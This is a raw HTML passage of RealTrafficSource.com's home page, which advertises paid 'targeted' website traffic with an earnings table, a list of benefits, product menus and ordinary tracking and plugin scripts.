Arial, sans-serif;color:#222222; }h2 { font:bold 20px/1.2em Arial, sans-serif;color:#222222; }h3 { font:bold 18px/1.2em Arial, sans-serif;color:#3d3d3d; }h4 { font:normal 16px/1.2em Arial, sans-serif;color:#222222; }h5 { font:bold 12px/1.2em Arial, sans-serif;color:#222222; }h6 { font:bold 12px/1.2em Arial, sans-serif;color:#222222; } .page-title, .post .title, .page .title {font:normal 25px/1.1em Arial, sans-serif;color:#222222;} .post .title a:link, .post .title a:visited, .page .title a:link, .page .title a:visited {color:#222222} .post-meta { font:normal 11px/1.5em Helvetica Neue, Helvetica, sans-serif;color:#999999; } .entry, .entry p{ font:normal 13px/1.5em Helvetica Neue, Helvetica, sans-serif;color:#555555; } .post-more {font:normal 12px/1.5em &quot;Helvetica Neue&quot;, Helvetica, sans-serif;color:;border-top:0px solid #e6e6e6;border-bottom:0px solid #e6e6e6;} #post-author, #connect {border-top:1px solid #e6e6e6;border-bottom:1px solid #e6e6e6;border-left:1px solid #e6e6e6;border-right:1px solid #e6e6e6;border-radius:5px;-moz-border-radius:5px;-webkit-border-radius:5px;background-color:#fafafa} .nav-entries a, .woo-pagination { font:normal 12px/1em Helvetica Neue, Helvetica, sans-serif;color:#888; } .woo-pagination a, .woo-pagination a:hover {color:#888!important} .widget h3 {font:normal 15px/1.2em Tahoma, Geneva, Verdana, sans-serif;color:#555555;border-bottom:0px solid #e6e6e6;margin-bottom:0;} .widget_recent_comments li, #twitter li { border-color: #e6e6e6;} .widget p, .widget .textwidget { font:normal 13px/1.5em Arial, sans-serif;color:#555555; } .widget {font:normal 13px/1.5em Arial, sans-serif;color:#555555;border-radius:0px;-moz-border-radius:0px;-webkit-border-radius:0px;} #tabs .inside li a, .widget_woodojo_tabs .tabbable .tab-pane li a { font:bold 12px/1.5em Helvetica Neue, Helvetica, sans-serif;color:#555555; } #tabs .inside li span.meta, .widget_woodojo_tabs .tabbable .tab-pane li span.meta { font:normal 12px/1.5em Helvetica Neue, Helvetica, sans-serif;color:#555555; } #tabs ul.wooTabs li a, .widget_woodojo_tabs .tabbable .nav-tabs li a { font:normal 12px/2em Helvetica Neue, Helvetica, sans-serif;color:#555555; } @media only screen and (min-width:768px) { ul.nav li a, #navigation ul.rss a, #navigation ul.cart a.cart-contents, #navigation .cart-contents #navigation ul.rss, #navigation ul.nav-search, #navigation ul.nav-search a { font:bold 13px/1.2em Tahoma, Geneva, Verdana, sans-serif;color:#666666; } #navigation ul.rss li a:before, #navigation ul.nav-search a.search-contents:before { color:#666666;} #navigation ul.nav li ul, #navigation ul.cart > li > ul > div { border: 1px solid #dbdbdb; } #navigation ul.nav > li { border-right: 1px solid #dbdbdb; }#navigation ul li:first-child, #navigation ul li:first-child a { border-radius:5px 0 0 5px; -moz-border-radius:5px 0 0 5px; -webkit-border-radius:5px 0 0 5px; } #navigation {background:#ffffff;border-top:1px solid #dbdbdb;border-bottom:1px solid #dbdbdb;border-left:1px solid #dbdbdb;border-right:1px solid #dbdbdb;border-radius:5px; -moz-border-radius:5px; -webkit-border-radius:5px;} #top ul.nav li a { font:normal 14px/1.6em 'Yanone Kaffeesatz', arial, sans-serif;color:#ddd; } } #footer, #footer p { font:normal 13px/1.4em Helvetica Neue, Helvetica, sans-serif;color:#999999; } #footer {border-top:1px solid #dbdbdb;border-bottom:0px solid ;border-left:0px solid ;border-right:0px solid ;border-radius:0px; -moz-border-radius:0px; -webkit-border-radius:0px;} .magazine #loopedSlider .content h2.title a { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } .wooslider-theme-magazine .slide-title a { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } .magazine #loopedSlider .content .excerpt p { font:normal 12px/1.5em Arial, sans-serif;color:#cccccc; } .wooslider-theme-magazine .slide-content p, .wooslider-theme-magazine .slide-excerpt p { font:normal 12px/1.5em Arial, sans-serif;color:#cccccc; } .magazine .block .post .title a {font:bold 18px/1.2em Helvetica, Arial, sans-serif;color:#222222; } #loopedSlider.business-slider .content h2 { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } #loopedSlider.business-slider .content h2.title a { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } .wooslider-theme-business .has-featured-image .slide-title { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } .wooslider-theme-business .has-featured-image .slide-title a { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } #wrapper #loopedSlider.business-slider .content p { font:normal 12px/1.5em Arial, sans-serif;color:#cccccc; } .wooslider-theme-business .has-featured-image .slide-content p { font:normal 12px/1.5em Arial, sans-serif;color:#cccccc; } .wooslider-theme-business .has-featured-image .slide-excerpt p { font:normal 12px/1.5em Arial, sans-serif;color:#cccccc; } .archive_header { font:bold 18px/1em Arial, sans-serif;color:#222222; } .archive_header {border-bottom:1px solid #e6e6e6;} </style> <style type="text/css" id="woo-header-bg-css"> #header { background-image:url(https://realtrafficsource.com/wp-content/uploads/2019/05/Real-Traffic-Source-logo-100519.png); } </style> <!-- Custom Favicon --> <link rel="shortcut icon" href="https://realtrafficsource.com/wp-content/uploads/2012/09/targeted-website-visitors-fav.png"/> <!-- Woo Shortcodes CSS --> <link href="https://realtrafficsource.com/wp-content/themes/canvas/functions/css/shortcodes.css" rel="stylesheet" type="text/css" /> <!-- Custom Stylesheet --> <link href="https://realtrafficsource.com/wp-content/themes/canvas/custom.css" rel="stylesheet" type="text/css" /> <!-- Theme version --> <meta name="generator" content="Canvas 5.12.0" /> <meta name="generator" content="WooFramework 6.2.9" /> <!-- Google Webfonts --> <link href="https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz%3A200%2C300%2Cregular%2C700" rel="stylesheet" type="text/css" /> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <script type="text/javascript"> jQuery(function(){ $foobar({ "height" : { "bar" : 30, "button" : 30 }, "width": { "left": "*", "center": "50%", "right": "*", "button": "80px" }, "position": { "ignoreOffsetMargin": false, "bar": "top", "button": "right", "social": "left" }, "display" : { "type" : "expanded", "delay" : 3000, "speed": 300, "backgroundColor" : "#52e385", "border" : "solid 3px #ffffff", "theme": { "bar": "triangle-arrow" }, "easing" : "easeOutElastic", "shadow" : false, "adjustPageHeight" : true, "rtl" : false }, "messages": [ "Save 10% On All Orders. Use Coupon \"tenoff\"" ], "message": { "delay": 2000, "fadeDelay": 500, "random": false, "navigation": false, "scroll": { "enabled": true, "speed": 50, "delay": 2000, "direction": "left" }, "font": { "family": "Arial", "size": "11pt", "color": "#3b3b3b", "shadow" : "0 1px 0 #888888" }, "aFont": { "family": "Arial", "size": "14pt", "color": "#082f94", "decoration": "none", "shadow" : "0 1px 0 #888888", "hover": { "color": "#0d42e0", "decoration": "underline", "shadow" : "0 1px 0 #888888" } } }, "social" : { "text" : "Connect:", "font": { "family": "Arial", "size": "10pt", "color": "#ffffff", "shadow" : "none" }, "profiles": [ {"name" : "FaceBook","url" : "https://www.facebook.com/realtrafficsource/","image" : "https://realtrafficsource.com/wp-content/plugins/foobar/images/social/facebook.png","target" : "_blank"}, {"name" : "Twitter","url" : "https://www.twitter.com/realtraffsource","image" : "https://realtrafficsource.com/wp-content/plugins/foobar/images/social/twitter-2.png","target" : "_blank"}, {"name" : "Youtube","url" : "https://www.youtube.com/user/webar2007?feature=mhee","image" : "https://realtrafficsource.com/wp-content/plugins/foobar/images/social/youtube.png","target" : "_blank"}, {"name" : "Linkedin","url" : "https://www.linkedin.com/pub/rick-hanson/40/460/125","image" : "https://realtrafficsource.com/wp-content/plugins/foobar/images/social/linkedin.png","target" : "_blank"}, {"name" : "Tumbl","url" : "https://realtrafficsource.tumblr.com/","image" : "https://realtrafficsource.com/wp-content/plugins/foobar/images/social/tumblr.png","target" : "_blank"}, ] }, "ssl" : true }); });</script><script type="text/javascript"> (function() {window.sib ={equeue:[],client_key:"8zndsld8m9vs7a8nu4fl7"};/* OPTIONAL: email for identify request*/window.sendinblue = {}; for (var j = ['track', 'identify', 'trackLink', 'page'], i = 0; i < j.length; i++) { (function(k) { window.sendinblue[k] = function() { var arg = Array.prototype.slice.call(arguments); (window.sib[k] || function() { var t = {}; t[k] = arg; window.sib.equeue.push(t);})(arg[0], arg[1], arg[2]);};})(j[i]);}var n = document.createElement("script"),i = document.getElementsByTagName("script")[0]; n.type = "text/javascript", n.id = "sendinblue-js", n.async = !0, n.src = "https://sibautomation.com/sa.js?key=" + window.sib.client_key, i.parentNode.insertBefore(n, i), window.sendinblue.page();})(); </script><script type="text/javascript" src="https://realtrafficsource.com/wp-content/plugins/si-captcha-for-wordpress/captcha/si_captcha.js?ver=1558022276"></script> <!-- begin SI CAPTCHA Anti-Spam - login/register form style --> <style type="text/css"> .si_captcha_small { width:175px; height:45px; padding-top:10px; padding-bottom:10px; } .si_captcha_large { width:250px; height:60px; padding-top:10px; padding-bottom:10px; } img#si_image_com { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_reg { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_log { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_side_login { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_checkout { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_jetpack { border-style:none; margin:0; padding-right:5px; float:left; } img#si_image_bbpress_topic { border-style:none; margin:0; padding-right:5px; float:left; } .si_captcha_refresh { border-style:none; margin:0; vertical-align:bottom; } div#si_captcha_input { display:block; padding-top:15px; padding-bottom:5px; } label#si_captcha_code_label { margin:0; } input#si_captcha_code_input { width:65px; } p#si_captcha_code_p { clear: left; padding-top:10px; } .si-captcha-jetpack-error { color:#DC3232; } </style> <!-- end SI CAPTCHA Anti-Spam - login/register form style --> <style type="text/css"> /* If html does not have either class, do not show lazy loaded images. */ html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image { display: none; } </style> <script> document.documentElement.classList.add( 'jetpack-lazy-images-js-enabled' ); </script> <script async src='https://stats.wp.com/s-201920.js'></script> </head> <body class="home page-template page-template-template-fullwidth page-template-template-fullwidth-php page page-id-14 cookies-not-set woocommerce-no-js gecko alt-style-default two-col-right width-1340 two-col-right-1340"> <div id="wrapper"> <div id="inner-wrapper"> <h3 class="nav-toggle icon"><a href="#navigation">Navigation</a></h3> <header id="header" class="col-full"> <div id="logo"> <a href="https://realtrafficsource.com/" title="Buy Website Traffic"><img src="https://realtrafficsource.com/wp-content/uploads/2019/05/Real-Traffic-Source-logo-100519-2.png" alt="RealTrafficSource.com" /></a> <h1 class="site-title"><a href="https://realtrafficsource.com/">RealTrafficSource.com</a></h1> <span class="site-description">Buy Website Traffic</span> </div> </header> <nav id="navigation" class="col-full" role="navigation"> <section class="menus nav-icons nav-icons-1 cart-extended"> <a href="https://realtrafficsource.com" class="nav-home"><span>Home</span></a> <h3>Top Menu</h3><ul id="main-nav" class="nav fl"><li id="menu-item-3279" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3279"><a href="https://realtrafficsource.com/about-us/">About</a></li> <li id="menu-item-5674" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5674"><a href="https://realtrafficsource.com/shop/">Shop</a></li> <li id="menu-item-5654" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-has-children menu-item-5654"><a href="https://realtrafficsource.com/product-category/targeted-traffic/">Targeted Traffic</a> <ul class="sub-menu"> <li id="menu-item-6380" class="menu-item menu-item-type-post_type menu-item-object-product menu-item-6380"><a href="https://realtrafficsource.com/product/targeted-social-traffic/">Targeted Social Traffic</a></li> <li id="menu-item-6379" class="menu-item menu-item-type-post_type menu-item-object-product menu-item-6379"><a href="https://realtrafficsource.com/product/targeted-mobile-traffic/">Targeted Mobile traffic</a></li> </ul> </li> <li id="menu-item-5653" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-5653"><a href="https://realtrafficsource.com/product-category/backlinks-seo/">SEO</a></li> <li id="menu-item-326" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-326"><a title="Contact RealTrafficSource.com" href="https://realtrafficsource.com/contact/">Contact</a></li> <li id="menu-item-324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-324"><a href="https://realtrafficsource.com/faq/">FAQ</a></li> <li id="menu-item-322" class="ppr-new-window menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-322"><a target="_blank" rel="noopener noreferrer" href="https://realtrafficsource.com/client-log-in/">My Stats</a> <ul class="sub-menu"> <li id="menu-item-5669" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5669"><a href="https://realtrafficsource.com/my-account/">My account</a></li> </ul> </li> <li id="menu-item-323" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-323"><a title="RealTrafficSource.com Reviews" href="https://realtrafficsource.com/testimonials/">Reviews</a></li> <li id="menu-item-6552" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6552"><a href="https://realtrafficsource.com/make-money-affiliates/">Affiliates</a></li> </ul> <div class="side-nav"> <ul class="cart fr no-rss-link"> <li> <a class="cart-contents" href="https://realtrafficsource.com/cart/" title="View your shopping cart"> <span class="count">0 items</span> - &#036;0.00 </a> <ul> <li><div class="widget woocommerce widget_shopping_cart"><div class="widget_shopping_cart_content"></div></div></li> </ul> </li> </ul> </div><!-- /#side-nav --> </section><!-- /.menus --> <a href="#top" class="nav-close"><span>Return to Content</span></a> </nav> <!-- #content Starts --> <div id="content" class="col-full"> <div id="main-sidebar-container"> <!-- #main Starts --> <section id="main"> <article class="post-14 page type-page status-publish hentry"> <header> <h2 class="title entry-title">Buy Website Traffic For Less Than 1 Cent Pr View!</h2> </header> <section class="entry"> <blockquote> <h3><sup>Guaranteed Targeted Traffic Is The Key To Success Online And When It Comes To Generating A Motherload, We Know EXACTLY What We&#8217;re Doing</sup></h3> </blockquote> <p><span class="embed-youtube" style="text-align:center; display: block;"><iframe class='youtube-player' type='text/html' width='640' height='360' src='https://www.youtube.com/embed/LjaQUZA9M3U?version=3&#038;rel=1&#038;fs=1&#038;autohide=2&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' allowfullscreen='true' style='border:0;'></iframe></span></p> <h2 style="text-align: center;">Have You Been One Of These &#8220;Victims&#8221;?</h2> <ul> <li> <div style="text-align: left;"><strong>Have You Tried SEO?</strong> (I&#8217;m Sure You Have Wasted A Lot Of Time And Even Money On That Too, As I Confess That I Did It When I Was A Beginner.)</div> </li> <li><strong>Almost Emptied Out Your Bank Account With PPC?</strong></li> <li><strong>Spent Your Precious Time On Creating Videos?</strong></li> <li><strong>Tried Article Marketing To Make You Some Money With No Luck?&#8221;</strong></li> </ul> <p style="text-align: left;"> We can go on and on and on, but let&#8217;s not waste any time. We want to stand out in the crowd and really give you something of value.</p> <h3 style="text-align: center;">Need Cheap Website Traffic To Your Website? Buy Website Traffic Like Google Adwords For A Fraction Of The Cost!</h3> <p style="text-align: left;">Want to increase web traffic, more exposure and maximize your marketing efforts? Need more <span style="text-decoration: underline;"><strong>cheap website traffic</strong></span>? Solution: <strong><em><span style="text-decoration: underline;">Buy website traffic</span> </em></strong>from us.</p> <p>Imagine bringing in <a href="https://realtrafficsource.com/traffic-shop/">thousands of new customers</a> to your website each week. At Real Traffic Source, our Internet Advertising and Online Marketing solutions deliver highly targeted, qualified customers directly to your website. <em>B</em><em>uy</em><em> w</em><em>ebsite</em><em> tra</em><em>ffic </em>with our services and you will find that our traffic is steady and reliable. SEO traffic comes and goes, while our cheap guaranteed targeted traffic is a constant stream of buyers and leads.</p> <p>Our advertising packages will bring your site the much needed cheap website traffic, and great prices.  Why wait? Buy website traffic now and increase your sales today.</p> <h2 style="text-align: center;">Buy Website Traffic; Benefits And Advantages</h2> <p>Lets assume you have a product that sells for $15. If you purchase 100,000 guaranteed visitors you would make $1500.00 based on a 0.1% (one tenth of one percent) response rate. Imagine if you were to get a 1% or higher response!</p> <style> table#t1 { border-collapse: collapse; border-width: 0px; border-style: outset; line-height: 2.0em; text-align: center; vertical-align: top;width: 100%;border-top: 1px solid #CCCCCC;box-shadow: 0 0px 5px rgba(0, 0, 0, 0.4); } table#t1 thead tr { } table#t1 thead tr th.t1 { color: #000000; background: #FFFFFF; background: -moz-linear-gradient(top, #FFFFFF 0%, #EEEEEE 100%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#FFFFFF), color-stop(100%,#EEEEEE)); background: -webkit-linear-gradient(top, #FFFFFF 0%,#EEEEEE 100%); background: -o-linear-gradient(top, #FFFFFF 0%,#EEEEEE 100%); background: -ms-linear-gradient(top, #FFFFFF 0%,#EEEEEE 100%); background: linear-gradient(to bottom, #FFFFFF 0%,#EEEEEE 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr="#FFFFFF", endColorstr="#EEEEEE",GradientType=0 ); font-size: 1.5em; letter-spacing: 0; line-height: 2.0; padding: 4px; text-transform: none; text-align: center;border-bottom: 1px solid #CCCCCC; } table#t1 thead tr th#t1.start { } table#t1 thead tr th#t1.end { } table#t1 tbody tr { background: none repeat scroll 0 0 #F5F5F5; } table#t1 tbody tr.table-alternate { background: none repeat scroll 0 0 #FFFFFF; } table#t1 tbody tr td { color: #000000; padding: 5px; border-width: 0px; line-height: 1.2; font-size: 1.0em; border-top: medium none;border-bottom: 1px solid #CCCCCC; text-align: center; vertical-align: top; } table#t1 tbody tr td#n1 { width: 35%; }table#t1 tbody tr td#n2 { width: 35%; }table#t1 tbody tr td#n3 { width: 35%; } table#t1 tbody tr:hover td { } table#t1 tfoot tr { } table#t1 tfoot tr td { color: #000000; background: #FFFFFF; background: -moz-linear-gradient(top, #FFFFFF 0%, #EEEEEE 100%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#FFFFFF), color-stop(100%,#EEEEEE)); background: -webkit-linear-gradient(top, #FFFFFF 0%,#EEEEEE 100%); background: -o-linear-gradient(top, #FFFFFF 0%,#EEEEEE 100%); background: -ms-linear-gradient(top, #FFFFFF 0%,#EEEEEE 100%); background: linear-gradient(to bottom, #FFFFFF 0%,#EEEEEE 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr="#FFFFFF", endColorstr="#EEEEEE",GradientType=0 ); padding: 4px; border-width: 0px; font-size: 1.0em; border-top: medium none; text-align: center; } </style><table id="t1"> <thead> <tr><th scope="col" class="t1" id="n1">Response Rate</th><th scope="col" class="t1" id="n2">Total Sales</th><th scope="col" class="t1" id="n3">You Earn</th></tr></thead><tfoot><tr><td>Response Rate</td><td>Total Sales</td><td>You Earn</td></tr></tfoot> <tbody><tr class="table-alternate row1"> <td id="n1" class="start">0,1%</td><td id="n2" >100</td><td id="n3" >$1,500</td></tr><tr class= "table-noalt row2"><td id="n1" class="start">1%</td><td id="n2" >1000</td><td id="n3" >$15,000</td></tr><tr class="table-alternate row3"> <td id="n1" class="start">3%</td><td id="n2" >3000</td><td id="n3" >$45,000</td></tr></tbody></table> <h2 style="text-align: center;">You Have The Site, We Increase Web Traffic For You!</h2> <p>We will send up to 250,000 cheap global <strong>targeted web site visitors</strong> to your website starting immediately! <strong>That&#8217;s targeted, cheap website traffic</strong>, not banner impressions or emails. Would you like to have thousands of potential customers looking at your website, ready to buy your product or service? If so, then read on &#8230;</p> <p>Do you know why a lot of online businesses fail? It&#8217;s simple really. They don&#8217;t have anyone visiting their websites. The web has become so large that unless you spend tens of thousands of dollars on advertising nobody is going to find you. If people can&#8217;t find you, they can&#8217;t order anything from you, which is why you need to buy web traffic from us. To put it simply:</p> <h2 style="text-align: center;">No Targeted Traffic = No Sales = No Money</h2> <p style="text-align: center;"><a href="https://realtrafficsource.com/12-2/attachment/traffic-visitor-increase/" rel="attachment wp-att-641"><img data-attachment-id="641" data-permalink="https://realtrafficsource.com/buy-website-traffic-less-1-cent-pr-view/traffic-visitor-increase/" data-orig-file="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?fit=532%2C298&amp;ssl=1" data-orig-size="532,298" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="traffic-visitor-increase" data-image-description data-medium-file="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?fit=300%2C168&amp;ssl=1" data-large-file="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?fit=532%2C298&amp;ssl=1" class="aligncenter wp-image-641 size-full jetpack-lazy-image" title="guaranteed targeted traffic" src="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?resize=532%2C298&#038;ssl=1" alt="buy website traffic" width="532" height="298" data-recalc-dims="1" data-lazy-srcset="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?w=532&amp;ssl=1 532w, https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?resize=300%2C168&amp;ssl=1 300w" data-lazy-sizes="(max-width: 532px) 100vw, 532px" data-lazy-src="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?resize=532%2C298&amp;is-pending-load=1#038;ssl=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img data-attachment-id="641" data-permalink="https://realtrafficsource.com/buy-website-traffic-less-1-cent-pr-view/traffic-visitor-increase/" data-orig-file="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?fit=532%2C298&amp;ssl=1" data-orig-size="532,298" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="traffic-visitor-increase" data-image-description="" data-medium-file="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?fit=300%2C168&amp;ssl=1" data-large-file="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?fit=532%2C298&amp;ssl=1" class="aligncenter wp-image-641 size-full" title="guaranteed targeted traffic" src="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?resize=532%2C298&#038;ssl=1" alt="buy website traffic" width="532" height="298" srcset="https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?w=532&amp;ssl=1 532w, https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?resize=300%2C168&amp;ssl=1 300w" sizes="(max-width: 532px) 100vw, 532px" data-recalc-dims="1" /></noscript></a></p> <p>We know this because we struggled for years trying to <em><span style="text-decoration: underline;">increase web traffic </span></em>to our websites. After wasting hundreds of dollars on banner advertising and building &#8220;doorway pages&#8221; we knew there had to be a better way to generate web site traffic .</p> <p>After a lot of thinking and many sleepless nights, we hit on a brilliant idea that would generate high speed <em><span style="text-decoration: underline;">targeted, cheap website traffic</span></em> at prices anyone could afford. By selling this guaranteed targeted traffic to other web sites we would create a win-win situation!</p> <p>We can&#8217;t go into the details of <a href="http://realtrafficsource.com/faq">how we do it</a> (it&#8217;s our secret!) but we promise that we will send real people to look at your website. Visit our sales pages and <strong>buy website traffic</strong> now!</p> <h3>Why Buy Website Traffic From RealTrafficSource.com?</h3> <ul> <li>Low cost advertising</li> <li>Promote new products</li> <li>Increase your website’s activity</li> <li>Boost sales and conversions</li> <li>Improve ad conversion rates and impressions</li> <li>Attract quality, new members to your site</li> <li>Jump start your website’s traffic statistics</li> <li>Boost in stats = increased value and resale value of your website or business</li> <li>Realtime tracking of your visitors</li> <li>Increase your search engine rankings</li> <li>Increased Alexa ranking</li> <li><a href="https://realtrafficsource.com/buy-social-traffic/">Access to social media traffic</a></li> <li>The traffic will start <strong>within 24 hours</strong> after payment</li> <li><a href="https://www.sitejabber.com/reviews/realtrafficsource.com" target="_blank" rel="noopener noreferrer">Reliable and trusted traffic supplier</a></li> </ul> </section><!-- /.entry --> <div class="fix"></div> </article><!-- /.post --> </section><!-- /#main --> <aside id="sidebar"> <div id="woocommerce_widget_cart-3" class="widget woocommerce widget_shopping_cart"><h3>Cart</h3><div class="widget_shopping_cart_content"></div></div><div id="nav_menu-4" class="widget widget_nav_menu"><h3>Most Popular Services</h3><div class="menu-geo-targeted-traffic-container"><ul id="menu-geo-targeted-traffic" class="menu"><li id="menu-item-5658" class="menu-item menu-item-type-post_type menu-item-object-product menu-item-5658"><a href="https://realtrafficsource.com/product/targeted-usa-visitors-and-leads/">USA Visitors and Leads</a></li> <li id="menu-item-5665" class="menu-item menu-item-type-post_type menu-item-object-product menu-item-5665"><a href="https://realtrafficsource.com/product/targeted-social-traffic/">Targeted Social Traffic</a></li> <li id="menu-item-5666" class="menu-item menu-item-type-post_type menu-item-object-product menu-item-5666"><a href="https://realtrafficsource.com/product/targeted-canadian-visitors-leads/">Canadian Visitors and Leads</a></li> <li id="menu-item-5667" class="menu-item menu-item-type-post_type menu-item-object-product menu-item-5667"><a href="https://realtrafficsource.com/product/targeted-uk-visitors-leads/">UK Visitors and Leads</a></li> </ul></div></div><div id="custom_html-2" class="widget_text widget widget_custom_html"><h3>Safe, Secure And Malware Free</h3><div class="textwidget custom-html-widget"><a href="https://monitor7.sucuri.net/verify.php?r=0d56dcdc85e053927403e8a1efaf220bccbcfe68cf"><img src="https://i0.wp.com/realtrafficsource.com/images/sucuri.png?ssl=1" alt="RealTrafficSource safe" data-recalc-dims="1" data-lazy-src="https://i0.wp.com/realtrafficsource.com/images/sucuri.png?ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img src="https://i0.wp.com/realtrafficsource.com/images/sucuri.png?ssl=1" alt="RealTrafficSource safe" data-recalc-dims="1" /></noscript></a><br /> <a href="https://realtrafficsource.com/sucuri" target="_blank" rel="noopener noreferrer">Guide: Protect Your Site</a> <br /><br /> <span id="ss_img_wrapper_115-55_image_en"><a href="http://www.alphassl.com/ssl-certificates/wildcard-ssl.html" target="_blank" title="SSL Certificates" rel="noopener noreferrer"><img alt="Wildcard SSL Certificates" border="0" id="ss_img" src="https://i1.wp.com/seal.alphassl.com/SiteSeal/images/alpha_noscript_115-55_en.gif?ssl=1" title="SSL Certificate" data-recalc-dims="1" data-lazy-src="https://i1.wp.com/seal.alphassl.com/SiteSeal/images/alpha_noscript_115-55_en.gif?ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img alt="Wildcard SSL Certificates" border=0 id="ss_img" src="https://i1.wp.com/seal.alphassl.com/SiteSeal/images/alpha_noscript_115-55_en.gif?ssl=1" title="SSL Certificate" data-recalc-dims="1"/></noscript></a></span><script type="text/javascript" src="//seal.alphassl.com/SiteSeal/alpha_image_115-55_en.js"></script></div></div><div id="custom_html-3" class="widget_text widget widget_custom_html"><h3>Happy Customer Video Review</h3><div class="textwidget custom-html-widget"><iframe width="370" height="278" src="https://www.youtube.com/embed/HLg9Wdl_WKQ" frameborder="0" allowfullscreen></iframe></div></div> <div id="recent-posts-2" class="widget widget_recent_entries"> <h3>Premium Posts</h3> <ul> <li> <a href="https://realtrafficsource.com/buy-website-traffic-traffic-system/">Should You Buy Website Traffic &#8211; Or Use A Traffic System?</a> </li> <li> <a href="https://realtrafficsource.com/targeted-traffic-is-the-hidden-formula-for-great-sales-and-conversions/">Targeted Traffic Is The Hidden Formula For Great Sales and Conversions!</a> </li> <li> <a href="https://realtrafficsource.com/the-best-seo-tips-for-quick-and-fast-results/">The Best SEO Tips For Quick And Fast Results</a> </li> <li> <a href="https://realtrafficsource.com/generate-weight-loss-web-traffic/">Generate Weight Loss Web Traffic</a> </li> <li> <a href="https://realtrafficsource.com/traditional-but-useful-methods-of-traffic-generation/">Traditional, But Useful Methods Of Traffic Generation</a> </li> </ul> </div><div id="linkcat-2" class="widget widget_links"><h3>Our Best Friends</h3> <ul class='xoxo blogroll'> <li><a href="https://realtrafficsource.com/500k-classifieds" rel="friend" title="Free Classified Ads" target="_blank">550.000 Free Classified Ads</a></li> <li><a href="https://realtrafficsource.com/free-emails" rel="friend" target="_blank">5K Free Email Subscribers</a></li> <li><a href="https://realtrafficsource.com/webhost" rel="friend" target="_blank">Cheap Web Hosting</a></li> <li><a href="https://realtrafficsource.com/addme" rel="friend" target="_blank">Free Facebook Likes</a></li> <li><a href="https://realtrafficsource.com/easy-free-traffic" rel="friend" target="_blank">Get Free Visitors</a></li> <li><a href="https://realtimesignups.com" rel="me" target="_blank">Guaranteed USA Signups</a></li> </ul> </div> <div id="search-3" class="widget widget_search"><h3>Search The Site</h3><div class="search_main"> <form method="get" class="searchform" action="https://realtrafficsource.com/" > <input type="text" class="field s" name="s" value="Search..." onfocus="if (this.value == 'Search...') {this.value = '';}" onblur="if (this.value == '') {this.value = 